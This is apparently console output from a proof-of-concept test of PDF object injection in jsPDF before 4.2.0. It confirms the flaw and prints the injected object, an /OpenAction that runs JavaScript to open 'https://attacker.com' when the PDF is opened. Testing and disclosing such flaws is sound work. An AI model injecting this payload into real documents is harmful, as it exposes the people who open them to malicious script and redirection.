[*] Testing jsPDF PDF Object Injection
[*] jsPDF version: < 4.2.0 (vulnerable)
[*] Creating PDF with malicious payload...
[*] PDF saved as vulnerable.pdf
[+] VULNERABILITY CONFIRMED: /OpenAction found in PDF output!
[+] The malicious payload successfully injected a PDF object.

[*] Context around injection:
R]
>>
endobj
20 0 obj
<<
/S /JavaScript
/JS () >> /OpenAction << /S /JavaScript /JS (app.launchURL('https://attacker.com', true)) >>)
>>
endobj
21 0 obj
<<
/Producer (jsPDF 4.1.0)
/CreationDate (D:20260219205115-00'00')
>>
endobj
22 0 obj
<<
/Type /C